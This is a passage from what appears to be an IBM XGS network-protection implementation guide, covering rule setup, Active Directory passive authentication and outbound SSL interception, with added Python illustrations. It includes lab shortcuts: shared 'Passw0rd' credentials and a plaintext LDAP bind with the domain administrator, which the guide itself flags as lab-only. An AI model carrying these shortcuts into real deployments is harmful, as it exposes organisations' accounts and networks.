On the Response tab, add the Event Log object to Added Objects. On the Source tab, add Any
to Added Objects and leave the others in Available Objects. On the Destination tab, add Any to
Added Objects and leave the others in Available Objects.
On the Application tab, click New and select Domain Certificate Categories.
In the Add Domain Category window, specify the Name for the object.
On the Domain Categories tab, click the Filter button and create a filter using the
following parameters:
Match: all rules
Column: Available Domain Certificate
Condition: contains
Value: web storage
The Filter returns a list of Domain Categories with web storage content. Add Web Storage - All
to the Added Domain Certificates list. Click Save Configuration.
Add the new category to Added Objects.
On the Inspection tab, add Default IPS object to Added Objects. On the Schedule tab, leave
Added Objects empty. Click Save Configuration and Deploy.
Accessing the web storage site
Launch a browser and browse to https://www.dropbox.com.
XGS blocks access to the site.
XGS detects and blocks the user from accessing sites listed in the Domain Certificate Category
To navigate to the Network Access Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Network Access Events tab. XGS
has generated an event for the associated network activity.
Configuring non-web applications in a Network Access Policy to block certain applications from communicating on the network
This use case describes how to configure the Network Access Policy to control a user’s access
to a non-web application. Use Non-web Application objects to control non-web applications that
can communicate with one another in your network. In this example, XGS controls a user’s
access to Skype.
Accessing the Network Access Policy
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the
main menu and then click Network Access Policy under the Security Policies.
Configuring a Network Access rule
Click the New button to open the Add Network Access Rule window. On the General
Configuration tab, enter 1 in the Order field. Select the Enable check box. Set the Action to
Reject.
On the Response tab, add the Event Log object to Added Objects. On the Source tab, add Any
to Added Objects and leave the others in Available Objects. On the Destination tab, add Any to
Added Objects and leave the others in Available Objects.
On the Application tab, click New and select Non-Web Application.
In the Add Non-web Application Object window, specify the Name and select the Skype – VOIP,
Instant Messaging check box.
Note: Non-Web Application objects contain individual desktop applications or
protocols used by these applications. XGS also provides a limited number of
application categories, including commonly used applications that you might want to
reject or to allow access to your network. These include peer-to-peer (P2P)
applications, instant messaging applications, and social networking applications.
Implementation Guide for IBM Security Network Protection
On the Restriction tab, select Any for the Protocol and click Save Configuration.
Add the newly created Non-web Application object to Added Objects.
On the Inspection tab, add the Default IPS object to Added Objects. On the Schedule tab,
leave Added Objects empty. Click Save Configuration and Deploy.
Installing Skype
Upon downloading Skype, launch the executable and complete the installation.
After the installation completes, log in to Skype.
Note that the application tried to connect to the Skype servers but failed.
XGS detects and blocks user from connecting to Skype
To navigate to the Network Access Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Network Access Events tab. XGS
has generated an event for the associated network activity.
Configuring IP reputation to block access to external servers
This use case describes how to configure the Network Access Policy to control the user’s access
to specific IP addresses that have a reputation of providing spam, anonymous proxies, dynamic
IP addresses, or malware. In this example, XGS blocks the user’s access to an IP address
categorized as an Anonymous Proxy in the IP Reputation category.
Accessing the Network Access Policy
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the
main menu and then click Network Access Policy under the Security Policies.
Configuring a Network Access Policy
Click the New button to open the Add Network Access Rule window. On the General
Configuration tab, enter 1 in the Order field. Select the Enable check box. Set the Action to
Reject.
On the Response tab, add the Event Log object to Added Objects. On the Source tab, add Any
to Added Objects and leave the others in Available Objects. On the Destination tab, add Any to
Added Objects and leave the others in Available Objects.
On the Application tab, select New > IP Reputation Category to create a new IP Reputation
category object.
Enter the following attributes and parameters for the IP Reputation category object and save the
configuration.
On the Application tab, add the new IP reputation object to Added Objects.
Save the configuration and deploy the changes.
XGS detects and blocks users from accessing Anonymous Proxy IP addresses
For demonstration or testing purposes, verify the IP address classification via AppLoupe. In this
example, 91.216.73.32 is categorized as Anonymous Proxies (86%).
Launch the web browser and access the IP address categorized as an anonymous proxy.
XGS blocks the access.
If you have a packet capture of the network traffic, you notice that the HTTP request was
intercepted by XGS and XGS responded with a “Website Blocked” message.
Click the Monitor Analysis and Diagnostics link from the main menu and then click Event Log.
Select the Network Access Events tab. Verify the rejected events.
Launch a command line prompt and ping to the IP address. You will notice that the IP address is
unreachable.
The Network Access Events shows the ICMP traffic being blocked.
Optional: Event data forwarded to SiteProtector and QRadar
XGS sends the following event to SiteProtector when it is managed by SiteProtector.
XGS sends the following syslog event to the QRadar Console when the Remote Event log
object is configured as a response in the Network Access Policy rule.
Configuring Geolocation to block access to external servers
This use case describes how to configure the Network Access Policy to control user access to
an IP address hosted in a specific geographical location. In this example, XGS blocks the user’s
access to an IP address located in Japan.
Accessing the Network Access Policy
To navigate to the Network Access Policy, click the Secure Policy Configuration link from the
main menu and then click Network Access Policy under the Security Policies.
Configuring a Network Access Policy
Click the New button to open the Add Network Access Rule window. On the General
Configuration tab, enter 1 in the Order field. Select the Enable check box. Set the Action to
Reject.
Select the Response tab and add an Event log object to Added Objects. On the Source tab,
add Any to Added Objects and leave the others in Available Objects.
Select the Destination tab and select New > Geolocation to create a Geolocation object for
Japan.
For Name, enter Japan. In this example, a Network Access Policy rule blocks the traffic to the
Japan region.
On the Geolocations tab, add the Japan Geolocation to Added Geolocations and save the
configuration.
On the Destination tab, add the new Geolocation object to Added Objects.
Save the configuration and deploy the changes.
XGS detects and blocks users from accessing IP addresses hosted in the geolocation
For demonstration or testing purposes, verify the IP address via the AppLoupe site. In this
example, the IP address of www.jnto.go.jp is 202.79.244.228, and that address is hosted in the
Japan region.
Launch the web browser and navigate to www.jnto.go.jp (202.79.244.228).
Because the IP address is located in Japan, XGS blocks the access.
To navigate to the Network Access Events, click the Monitor Analysis and Diagnostics link
from the main menu and then click Event Log. Select the Network Access Events tab.
Optional: Event data forwarded to SiteProtector and QRadar
XGS sends the following event to SiteProtector when it is managed by SiteProtector.
XGS sends the following remote syslog event to the QRadar Console when the Remote Event
Log object is configured as a response in the Network Access Policy rule.
Configuring Local Authentication to control web access based on user identity
This use case describes how to configure local authentication and the Network Access Policy
to control web access based on user identity. In this example, XGS requires the user to be
authenticated prior to accessing a website in the Social Networking-Business Networking URL
Category, such as LinkedIn.
Creating a user for local authentication
Navigate to Manage System Settings > Identity Settings > Local Users.
Click the New button to open the Add Local User window. Type the appropriate values in the
User name, Name, Email, Password, and Password Confirmation fields. The User name is
used for authentication.
On the Group Membership tab, you can add the new user to existing groups. In this use case,
however, group membership is not used. Click the Save Configuration button.
The new user record is created. The following message appears because the mail server is not
configured in this environment.
Configuring the IP address for the Protection Interfaces
This setting defines the IP address that users are redirected to by a Network Access Policy rule
when the following circumstances occur:
- User authentication is required
- XGS rejects access to a website
To navigate to Protection Interfaces, click the Manage System Settings link from the main
menu and then click Protection Interfaces under Network Settings.
Tip: It is recommended that you make changes to the Protection Interfaces only
during noncritical hours.
Set the check box for the protection interface and click Edit.
On the General Settings tab, select the Enable check box and set the Inspection Mode to
Protection.
Click the IPv4 Settings tab and enter IP address information for the Address, Netmask, and
Gateway fields. The NAP rule uses the IP address for user authentication or blocking HTTP
traffic. This IP address is also used by the Outbound SSL Inspection policy if enabled. Save
the configuration and deploy the changes.
The local management interface restarts.
Configuring a Network Access Policy rule to authenticate users
Click the Secure Policy Configuration link from the main menu and select Network Access
Policy.
On the General Configuration tab, click the New button and enter 1 in the Order field. Set the
Action field to Authenticate (Reject). This action redirects a user to an authentication page on
XGS.
Note: If you enable user authentication on XGS and do not enable Outbound SSL Inspection,
end users who navigate to a secure website (that is, a website that uses the HTTPS protocol)
are not redirected to the authentication portal on XGS. Instead, their browsers are reset.
Therefore, it is recommended that you configure Outbound SSL Inspection to enforce user
authentication for access to secure websites. The Firefox browser shows the "The connection
was reset." error message.
On the Response tab, add the Event Log object to Added Objects. On the Source tab, add the
Unauthenticated Users object to Added Objects and leave the others in Available Objects. On
the Destination tab, add Any to Added Objects and leave the others in Available Objects. Click
the Save Configuration button.
Important: The Unauthenticated Users object must be used with the Authenticate (Reject)
action in a Network Access rule so that the rule applies only to users who have not been
authenticated.
Click the Secure Policy Configuration link from the main menu and select Network Access
Policy.
On the General Configuration tab, click the New button and enter 2 in the Order field. Set the
Action field to Accept. The action redirects a user to an authentication page on XGS.
On the Response tab, add the Event Log object to Added Objects. On the Source tab, add Any
to Added Objects and leave the others in Available Objects. On the Destination tab, add Any to
Added Objects and leave the others in Available Objects.
Click the Application tab. Click the New button and select URL Category to create a URL
Category application object.
In the Add URL Category Object window, under the Social Networking group, select Business
Networking. Click the Save Configuration button.
Tip: Twitter, Facebook, Google+, and Tumblr are categorized as Social Networking,
but LinkedIn is categorized as Business Networking.
Select the check box for the URL Category object and then move the object to Added Objects
by clicking the right-pointing arrow button. Save the configuration and deploy the changes.
Simulating an unauthenticated user accessing a website
Launch a web browser on the client machine and navigate to http://www.linkedin.com. This URL
is categorized as Business Networking and identified by the custom URL Category object.
Important: The Authenticate (Reject) action may block DNS traffic, and the web browser may
display "Server not found". In that case, it is important to add a rule to allow the DNS traffic.
The web browser displays a warning message as it is redirected to a secure login page that is
hosted on XGS. Click the Continue to the website (not recommended) link and accept the
Self-Signed SSL server certificate.
In the Network Access Authentication page, type the User name and Password for the local
user created in the previous steps. Click the Sign On button.
After the authentication, XGS redirects the user to the LinkedIn website.
To navigate to the Network Access Events, click the Monitor Analysis and Diagnostics link from
the main menu and then click Event Log. Select the Network Access Events tab. XGS has
generated an event for the associated network activity.
Click the Monitor Analysis and Diagnostics link from the main menu and then click Active
Sessions under Identity Settings.
The Active Sessions table shows logon information such as the User name, Directory Server
Name, IP Address of the client machine, and Logon Time.
Tip: To delete a user session and force reauthentication, select the check box for the
user and click the Delete button.
Note: If a user authenticates from multiple IP addresses, each session is displayed as a
separate entry. If another user authenticates from the same IP address, the session is
overridden by the new user.
Recommended rule order for enforcing user authentication using the Network Access Policy
In the following example, the second rule redirects an unauthenticated user to the authentication
page on XGS. It is important to have a first rule to allow DNS traffic. If you do not, the second rule
rejects all DNS queries from a web browser and the browser does not send HTTP requests that
trigger the redirection to the authentication page on XGS.
You can use the third rule to audit HTTP access to business networking websites such as
LinkedIn. In this example, the rule generates events when Bob (the local user) accesses
LinkedIn.
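The rule-order argument above, and the Active Sessions note before it (one entry per user and IP, a later user on the same IP overriding the earlier session), modelled as a small first-match evaluator. This is an added illustration written for this guide, not IBM code and not the real XGS matching engine; the client addresses and the default "No match" outcome are constructed assumptions.

```python
"""Toy first-match model of the three-rule Network Access Policy from the guide,
plus an Active Sessions table keyed by client IP. Illustration only, not IBM code."""
from dataclasses import dataclass
from typing import Optional


@dataclass
class Rule:
    order: int
    action: str                          # "Accept", "Reject" or "Authenticate (Reject)"
    source: str = "Any"                  # "Any" or "Unauthenticated Users"
    protocol: Optional[str] = None       # restrict to one protocol; None means Any
    url_category: Optional[str] = None   # e.g. "Business Networking"; None means Any
    event_log: bool = False              # Event Log object present on the Response tab


@dataclass
class Packet:
    src_ip: str
    protocol: str                        # "DNS", "HTTP", "ICMP"
    url_category: Optional[str] = None   # only meaningful for HTTP


class ActiveSessions:
    """Sessions keyed by client IP, following the guide's note: one user on two IPs
    gives two entries; a different user on the same IP overrides the first session."""

    def __init__(self):
        self._by_ip = {}

    def logon(self, user, client_ip):
        self._by_ip[client_ip] = user

    def delete(self, client_ip):
        """Equivalent of the Delete button: drop the session to force reauthentication."""
        self._by_ip.pop(client_ip, None)

    def user_for(self, client_ip):
        return self._by_ip.get(client_ip)

    def entries(self):
        return sorted((user, ip) for ip, user in self._by_ip.items())


def evaluate(rules, sessions, pkt):
    """Return (action, event) for the first rule matching pkt, or ("No match", None).
    "No match" is a label for this model; it does not claim what XGS does by default."""
    user = sessions.user_for(pkt.src_ip)
    for rule in sorted(rules, key=lambda r: r.order):
        if rule.source == "Unauthenticated Users" and user is not None:
            continue
        if rule.protocol is not None and rule.protocol != pkt.protocol:
            continue
        if rule.url_category is not None and rule.url_category != pkt.url_category:
            continue
        event = None
        if rule.event_log:
            event = f"rule {rule.order} {rule.action}: {pkt.protocol} from {user or 'unauthenticated'}@{pkt.src_ip}"
        return rule.action, event
    return "No match", None


# The three-rule order recommended in the guide: allow DNS, then authenticate, then audit.
RECOMMENDED = [
    Rule(1, "Accept", protocol="DNS"),
    Rule(2, "Authenticate (Reject)", source="Unauthenticated Users", event_log=True),
    Rule(3, "Accept", url_category="Business Networking", event_log=True),
]
# The same policy without the DNS rule: the failure mode the guide warns about.
WITHOUT_DNS_RULE = [r for r in RECOMMENDED if r.order != 1]


def walkthrough():
    """Replay the guide's scenario with constructed addresses; returns a dict of outcomes."""
    sessions = ActiveSessions()
    client = "192.168.5.50"      # constructed client IP
    dns = Packet(client, "DNS")
    linkedin = Packet(client, "HTTP", url_category="Business Networking")
    out = {}
    out["dns_no_rule"] = evaluate(WITHOUT_DNS_RULE, sessions, dns)[0]   # DNS query rejected
    out["dns_ok"] = evaluate(RECOMMENDED, sessions, dns)[0]             # DNS allowed by rule 1
    out["http_unauth"] = evaluate(RECOMMENDED, sessions, linkedin)[0]   # redirected to portal
    sessions.logon("bob", client)                 # Bob signs on at the XGS portal
    out["http_bob"], out["bob_event"] = evaluate(RECOMMENDED, sessions, linkedin)
    sessions.logon("bob", "192.168.5.51")         # same user, second IP: second entry
    sessions.logon("alice", client)               # another user on Bob's IP: override
    out["sessions"] = sessions.entries()
    sessions.delete(client)                       # forced reauthentication
    out["http_after_delete"] = evaluate(RECOMMENDED, sessions, linkedin)[0]
    return out


if __name__ == "__main__":
    for key, value in walkthrough().items():
        print(f"{key}: {value}")
```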
Configuring passive authentication with the Active Directory server
This use case describes how to configure passive authentication to control web access based on
user identity. Passive authentication requires installing the Logon-event Scanner software on the
Active Directory server. In this example, a Windows domain user logs on to a client machine that
belongs to a Windows domain. The Logon-event Scanner gathers the Windows logon events
and sends the information to XGS. This allows for controlling user access to websites without
requesting the user to authenticate to XGS.
Setting up Active Directory Domain Service
To set up Active Directory on the Windows server, navigate to Start menu > Administrative
Tools > Server Manager.
Click the Add Roles link to start the Add Roles wizard.
Click the Next button.
Select the Active Directory Domain Services check box and click the Next button.
Click the Next button.
Click the Install button.
The wizard ends with 1 warning message regarding a Windows update in this environment, but
you can ignore it. Click the Close button to finish the wizard.
After adding the Active Directory Domain Services role, run the dcpromo.exe program to
configure the Active Directory Domain Service.
In the Active Directory Domain Services Installation Wizard, make sure the Use advanced
mode installation check box is not selected and click the Next button.
Click the Next button.
Select Create a new domain in a new forest and click the Next button.
Type coe.local in the FQDN of the forest root domain field and click the Next button. In this
use case, the user name is [email protected] and the Windows client machine is
winclient.coe.local.
The installer verifies whether the domain name has been used in the network.
Under Forest function level, select Windows Server 2008 R2 and then click the Next button.
The Active Directory Domain Services Installation Wizard can install the DNS server
component along with Active Directory if the DNS server has not been installed. Select the
DNS server check box and click the Next button.
Click the Yes button to continue.
Leave the Database folder, Log files folder, and SYSVOL folder settings with default values
and click the Next button.
Type the appropriate value in the Password and Confirm password fields and click the Next
button.
Click the Next button.
Click the Next button.
Click the Finish button.
Click the Restart Now button.
Creating a Domain user on Active Directory
After installing the Active Directory, navigate to Start menu > Administrative Tools > Active
Directory Users and Computers to create a new Domain user.
Click the Users folder under the coe.local domain in the navigation tree.
Right-click the Users folder and create a new user.
In the First name field, enter Andrew. In the User logon name field, enter andrew. Click the
Next button.
Enter appropriate values for the Password and the Confirm password fields. For testing, clear
the User must change password at next logon check box and select the Password never
expires check box. Click the Next button.
Click the Finish button.
The new user Andrew is created in the Active Directory.
Configuring a Windows client for Active Directory
Log on to the Windows client machine as Administrator and configure the computer domain
setting to be a member of the coe.local domain.
You must authenticate with Domain Administrator credentials to add the computer to the domain.
Restart the Windows client machine.
On the Active Directory server, navigate to Start menu > Administrative Tools > Active
Directory Users and Computers to check the client computer.
Downloading the XGS SSL server certificate
Before installing the Logon-event Scanner software, you must download the SSL server
certificate of XGS. Launch a web browser to log on to the local management interface. Click the
Manage System Settings link from the main menu and then click Appliance SSL Certificate.
Click the Download PEM/Base64 encoded X.509 SSL Certificate button to start downloading
the XGS SSL server certificate file and save the file to the Active Directory server where the
Logon-event Scanner software will be installed. In this example, save the certificate file as
lmi.cert.
Configuring the Logon-event Scanner
Download the Logon-event Scanner installer from IBM Passport Advantage.
Tip: For IBM staff, this software is available at Software Sellers Workplace Software
Downloads site: https://w3.ibm.com/software/xl/download/ticket.do?openform.
Extract the downloaded zip file and run the SetupLogonEvents.exe file to start the setup
program.
Select a language and click the OK button.
Click the Next button.
Accept the license agreement and click the Next button.
Use the default installation path and click the Next button.
Enter the following values for the fields.
Target Hostname for Logon Events: 192.168.5.105
Target Port Number: 443
Target Servlet Name: /logonevent/logonListner.xml
Note: In this example, the Logon-event Scanner sends the logon information to the IP address
assigned to the protection interfaces of XGS, but it can send the data to the management port
too. If XGS is deployed in IDS mode and no protection interfaces exist, configure the
Logon-event Scanner to send the Windows logon events to the management port IP address.
For the Scanning Interval in MS field, enter 500. In the Max Events Per Transmission field,
enter 100.
Select the Enable SSL and Use Basic HTTP Authentication check boxes. Enter a Username
and Password; you provide the same values later when you configure the Logon-event Scanner
in the XGS local management interface. Click the Next button.
Click the Choose button and select the XGS SSL server certificate file that you downloaded in
the previous step. Click the Open button.
Click the Next button.
Click the Install button.
The installation process commences.
Click the Done button to complete the installation.
Configuring Remote Directory Servers
Navigate to Manage System Settings > Identity Settings > Remote Directory Servers.
Click the New button to open the Add Directory Server window. On the General tab, select the
Enable check box and enter the following values:
Priority: 1
Name: AD DC Server
Type: Active Directory
Server address: 192.168.5.128 (the IP address of the Active Directory server)
Port: 389
Timeout: 60
Click the Active Directory tab and enter the following values.
Security: Disable
Admin user: [email protected]
Admin password: (Windows password for the administrator)
Domain: coe.local
With Security set to Disable, XGS binds to the directory over plain LDAP on port 389, so the
admin credentials cross the network unencrypted. This is acceptable only in a lab; in production
enable LDAP security and bind with a dedicated read-only directory account rather than the
domain administrator.
On the Schema tab, under Schema type, select Active Directory.
On the General tab, click the Test Connectivity button.
Verify that the Status of test shows Success, and then click the OK button to close the Test
Connectivity window. In the Add Directory Server window, save the configuration and deploy the
changes.
Configuring Passive Authentication
Navigate to Manage System Settings > Identity Settings > Passive Authentication.
Click the New button to open the Add Tivoli Logon-event Scanner window.
For the Active Directory Server, select AD DC Server and then specify the IP address of the
machine where the Logon-event Scanner is running. Enter the basic authentication User name
and Password that you specified in the Logon-event Scanner installation wizard. In this use
case, the user name is scanner and the password is Passw0rd. Save the configuration and
deploy the changes.
Configuring a Network Access Policy
Click the Secure Policy Configuration link from the main menu and then click Network Access
Policy.
Note: In this network setup, the Active Directory server is located in the protected network
segment and XGS is configured with a Network Access rule to allow traffic between the XGS
management port and the Active Directory server. The following section describes how to
create a rule to allow communication between them. In a real production environment, this
rule might not be required for your network.
Click the New button to open the Add Network Access Rule window. On the General
Configuration tab, enter 1 in the Order field, select the Enable check box, and set the Action to
Accept.
On the Response tab, add the Event Log object to Added Objects.
On the Source tab, click the New button and select Host Address to create a host address
object for the IP address of the Active Directory server.
In the Add Host Address window, enter AD DC Server in the Name field and 192.168.5.128
in the Host Address field. Click Save Configuration to close the window.
Click the New button and select Host Address to create a host address object for the IP address
of the XGS management port.
In the Add Host Address window, enter XGS in the Name field and 192.168.5.105 in the Host
Address field. Click Save Configuration.
On the Source tab, select the check boxes for the two new Host Address objects and move
them to Added Objects by clicking the right-pointing arrow button.
On the Destination tab, select the check boxes for the same two Host Address objects and
move them to Added Objects in the same way, so that the rule covers traffic in both directions.
On the Application tab, add Any to Added Objects.
On the Inspection tab, add the Default IPS object to Added Objects. Save the configuration and
deploy the changes.
Simulating Passive Authentication
Log on to the Windows client machine (192.168.5.203) as andrew with a password of
Passw0rd.
On the Active Directory server, the Windows event viewer program shows the logon event with
Event ID 4624.
The logon event also includes the associated username (andrew) and the source network
address (192.168.5.203); the Logon-event Scanner forwards this pair to XGS, which is how the
user becomes associated with the client IP address.
In the XGS local management interface, click the Monitor Analysis and Diagnostics link from
the main menu and then click Active Sessions under Identity Settings. You see an active
session for the authenticated user.
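The correlation the Logon-event Scanner performs on these events, written out as an added Python example (illustrative code, not the scanner's or IBM's own): it parses the message body of Security events 4624 and 4634, keeps only real user accounts with a usable source address, keys sessions by Logon ID so that a logoff retires the right session, and answers the question XGS asks, which user sits behind a given IP address. The event texts are constructed samples in the layout of the Windows Security log, and the field regexes, the filtering of machine accounts and ANONYMOUS LOGON, and the session table are assumptions of this example.

```python
import re
from typing import Dict, List, Optional, Tuple

LOGON_EVENT = 4624   # "An account was successfully logged on"
LOGOFF_EVENT = 4634  # "An account was logged off"

# Constructed sample records (event id, message body) in the layout of the
# Windows Security log. They are illustrative, not exports from a real DC.
SAMPLE_EVENTS: List[Tuple[int, str]] = [
    (LOGON_EVENT,
     "An account was successfully logged on.\n"
     "Subject:\n\tSecurity ID:\tNULL SID\n\tAccount Name:\t-\n"
     "Logon Type:\t3\n"
     "New Logon:\n\tSecurity ID:\tS-1-5-21-1-2-3-1105\n\tAccount Name:\tandrew\n"
     "\tAccount Domain:\tCOE\n\tLogon ID:\t0x3E7A1\n"
     "Network Information:\n\tWorkstation Name:\tWIN7-CLIENT\n"
     "\tSource Network Address:\t192.168.5.203\n\tSource Port:\t49212\n"),
    # Machine-account logon from the same workstation: no person behind it.
    (LOGON_EVENT,
     "An account was successfully logged on.\nLogon Type:\t3\n"
     "New Logon:\n\tSecurity ID:\tS-1-5-21-1-2-3-1201\n\tAccount Name:\tWIN7-CLIENT$\n"
     "\tAccount Domain:\tCOE\n\tLogon ID:\t0x3E7B0\n"
     "Network Information:\n\tSource Network Address:\t192.168.5.203\n"),
    # Anonymous logon: carries no identity worth mapping to an address.
    (LOGON_EVENT,
     "An account was successfully logged on.\nLogon Type:\t3\n"
     "New Logon:\n\tSecurity ID:\tS-1-5-7\n\tAccount Name:\tANONYMOUS LOGON\n"
     "\tAccount Domain:\tNT AUTHORITY\n\tLogon ID:\t0x3E7C2\n"
     "Network Information:\n\tSource Network Address:\t192.168.5.150\n"),
    # Logoff of andrew's session; 4634 carries no address, only the Logon ID.
    (LOGOFF_EVENT,
     "An account was logged off.\n"
     "Subject:\n\tSecurity ID:\tS-1-5-21-1-2-3-1105\n\tAccount Name:\tandrew\n"
     "\tAccount Domain:\tCOE\n\tLogon ID:\t0x3E7A1\nLogon Type:\t3\n"),
]

# Field extraction: the "New Logon" block of a 4624 names the user, the
# "Subject" block of a 4634 names the session that ended.
_NEW_LOGON = re.compile(
    r"New Logon:.*?Account Name:[ \t]*(?P<user>[^\n]+?)[ \t]*\n"
    r".*?Account Domain:[ \t]*(?P<domain>[^\n]+?)[ \t]*\n"
    r".*?Logon ID:[ \t]*(?P<logon_id>0x[0-9A-Fa-f]+)", re.S)
_SUBJECT = re.compile(
    r"Subject:.*?Account Name:[ \t]*(?P<user>[^\n]+?)[ \t]*\n"
    r".*?Logon ID:[ \t]*(?P<logon_id>0x[0-9A-Fa-f]+)", re.S)
_SOURCE_IP = re.compile(r"Source Network Address:[ \t]*(?P<ip>\S+)")


def _is_person(account: str) -> bool:
    """Drop machine accounts (trailing $), placeholders and anonymous logons."""
    return not (account.endswith("$") or account in ("-", "ANONYMOUS LOGON"))


def _is_client_address(ip: str) -> bool:
    """Drop placeholder and loopback addresses, which map to no client."""
    return ip not in ("-", "::1", "127.0.0.1")


class IdentityTable:
    """Address-to-user mapping kept current from 4624/4634 events, keyed by Logon ID."""

    def __init__(self) -> None:
        self._sessions: Dict[str, Tuple[str, str]] = {}  # logon id -> (user, ip)

    def apply(self, event_id: int, message: str) -> None:
        if event_id == LOGON_EVENT:
            logon, src = _NEW_LOGON.search(message), _SOURCE_IP.search(message)
            if not logon or not src:
                return
            user, ip = logon.group("user"), src.group("ip")
            if _is_person(user) and _is_client_address(ip):
                qualified = f"{logon.group('domain')}\\{user}"
                self._sessions[logon.group("logon_id")] = (qualified, ip)
        elif event_id == LOGOFF_EVENT:
            subject = _SUBJECT.search(message)
            if subject:
                self._sessions.pop(subject.group("logon_id"), None)

    def user_for(self, ip: str) -> Optional[str]:
        """User currently associated with an address, or None if nobody is."""
        for user, addr in self._sessions.values():
            if addr == ip:
                return user
        return None

    def active_sessions(self) -> Dict[str, str]:
        return {addr: user for user, addr in self._sessions.values()}


def replay(events: List[Tuple[int, str]]) -> IdentityTable:
    """Feed events in log order, as the scanner does on each polling interval."""
    table = IdentityTable()
    for event_id, message in events:
        table.apply(event_id, message)
    return table


if __name__ == "__main__":
    print(replay(SAMPLE_EVENTS[:3]).active_sessions())  # {'192.168.5.203': 'COE\\andrew'}
    print(replay(SAMPLE_EVENTS).active_sessions())      # {} once andrew logs off
```

The machine-account and anonymous logons are the cases that matter in practice: a domain controller logs far more of them than user logons, and mapping them would attach a bogus identity to a workstation's address.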
Troubleshooting issues associated with the Logon-event Scanner
To generate a new Support file, click Manage System Settings from the main menu and select
Support Files under System Settings.
Download the Support file.
In the Support file, open production.log under var/www/lmi/log and look for 4xx HTTP status
codes on the requests from the Logon-event Scanner. A 4xx response means the scanner's
requests reach the LMI but are refused, which is usually a mismatch between the basic
authentication username and password configured in the scanner and those configured under
Passive Authentication. If the scanner's requests do not appear in the log at all, check the TLS
side first: the scanner must have been installed with the SSL server certificate downloaded
from this XGS.
Configuring an Outbound SSL Inspection policy to control access to SSL-enabled websites
This use case describes how to configure the Outbound SSL Inspection policy and the Network
Access Policy with a URL List object to control outbound web access. In this example, XGS
decrypts all HTTPS access to the Twitter main website and blocks access to a specific member
site, https://twitter.com/metasploit.
Important: Before you configure Outbound SSL Inspection, you must assign an IP address to the
protection pair.
Verifying the SSL Inspection license
To determine whether the SSL Inspection license is installed, click the Manage System
Settings link from the main menu and then click Overview under Updates and Licensing.
Configuring the Protection Interface
Click the Manage System Settings link from the main menu and then click Protection
Interfaces.
Select the check box for the protection interface and click the Edit button.
On the General Settings tab, set the Inspection Mode field to Protection and leave the other
settings at their defaults.
On the IPv4 Settings tab, enter the IP address information for the Address, Netmask and
Gateway fields. The IP address is used by the Outbound SSL Inspection and Network Access
Policy rule. Save the configuration and deploy the changes.
The LMI restarts. Click the link in the window to return to the LMI.
Configuring an Outbound SSL Inspection policy rule
When XGS receives a request from a client, XGS establishes a secure connection to the
destination server as if it were the client. Once it holds the server's certificate, XGS uses it as
the template for a forged certificate (also known as the proxy certificate) with the same subject,
signs the forged certificate with a CA certificate generated by XGS, and returns it to the client
in place of the real server certificate.
After XGS establishes a connection with the client by using the forged certificate, it is
conducting a man-in-the-middle session. The traffic is decrypted and inspected, or ignored
(depending on which Outbound SSL Inspection policy rule matches), and then re-encrypted
before it is forwarded to its destination. Because the client only ever sees the proxy certificate,
it is XGS rather than the browser that validates the real server certificate; the Certificate
Verification Options under SSL Inspection Settings control what happens when that validation
fails.
Click the Secure Policy Configuration link from the main menu and select Outbound SSL
Inspection policy.
Click the New button to add a new SSL Inspection policy rule.
On the General Configuration tab, set the Order to 1 and set the Action to Inspect.
In this scenario, XGS inspects all SSL/TLS traffic, so on the Source tab add Any to Added
Objects, and on the Destination tab add Any to Added Objects.
In this scenario, XGS does not verify the SSL server certificate but does inspect all SSL/TLS
traffic. On the Domain tab, add Any to Added Objects. Save the configuration and deploy the
changes.
Important: XGS supports Outbound SSL Inspection in inline mode only. IDS (passive
monitoring) mode is not supported.
Important: Man-in-the-middle (MITM) interception breaks desktop applications that validate the
certificates of the internet servers they talk to. For example, the Adobe Flash installer
downloads installation images from Adobe's servers during installation; when the Outbound SSL
Inspection policy replaces the server certificate with a proxy certificate, the installer stops
connecting because it receives an unexpected server certificate. Cloud storage clients such as
Dropbox, SkyDrive and Google Drive likewise do not work when the Outbound SSL Inspection
policy is enabled, and neither does Microsoft Windows Update; computers cannot connect to the
Microsoft Update servers. Expect to carve out exception rules for such destinations.
Important: A Domain Certificate object cannot be used to create an exception rule in the
Outbound SSL Inspection policy to ignore certain SSL/TLS traffic. XGS replaces the server
certificate using the MITM technique even if the Ignore action is specified in such a rule. To
create an exception rule, use network objects such as IP addresses in the Source or
Destination fields.
To create a rule that leaves HTTPS traffic to the XGS management interface untouched, click
the New button to add a new SSL Inspection policy rule. On the General Configuration tab,
set the Order to 1 and set the Action to Ignore.
On the Source tab, add Any to Added Objects.
On the Destination tab, add XGS (192.168.5.105) to Added Objects. On the Domain tab, add
Any to Added Objects. Save the configuration and deploy the changes.
Confirm in the rule list that this Ignore rule is ordered ahead of the Inspect rule; otherwise
browser sessions to the LMI are intercepted and presented with a proxy certificate.
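Rule evaluation for this policy, as an added Python example (not XGS code): it models Outbound SSL Inspection rules with Order, Action, Source, Destination and Domain, evaluates a connection against the enabled rules in Order and returns the first match, which is why the Ignore rule for the XGS management address has to sit ahead of the Inspect-all rule. IP objects are host addresses or CIDR strings, the Domain field is a server-name suffix match, and a connection matching no rule is passed through undecrypted; all three are assumptions of this example. Per the note above, the exception rule is keyed on a Destination IP object, not on a domain.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

ANY = "Any"


@dataclass(frozen=True)
class SslRule:
    order: int
    action: str               # "Inspect" or "Ignore"
    source: str = ANY         # host address or CIDR, or Any
    destination: str = ANY
    domain: str = ANY         # server-name suffix (assumed semantics), or Any
    enabled: bool = True
    name: str = ""


def _address_matches(obj: str, ip: str) -> bool:
    if obj == ANY:
        return True
    # strict=False lets a plain host address such as "192.168.5.105" act as a /32
    return ipaddress.ip_address(ip) in ipaddress.ip_network(obj, strict=False)


def _domain_matches(obj: str, server_name: str) -> bool:
    if obj == ANY:
        return True
    host, suffix = server_name.lower(), obj.lower()
    return host == suffix or host.endswith("." + suffix)


def evaluate(rules: List[SslRule], src: str, dst: str, server_name: str) -> Optional[SslRule]:
    """First enabled rule, in Order, whose Source, Destination and Domain all match."""
    for rule in sorted(rules, key=lambda r: r.order):
        if not rule.enabled:
            continue
        if (_address_matches(rule.source, src)
                and _address_matches(rule.destination, dst)
                and _domain_matches(rule.domain, server_name)):
            return rule
    return None


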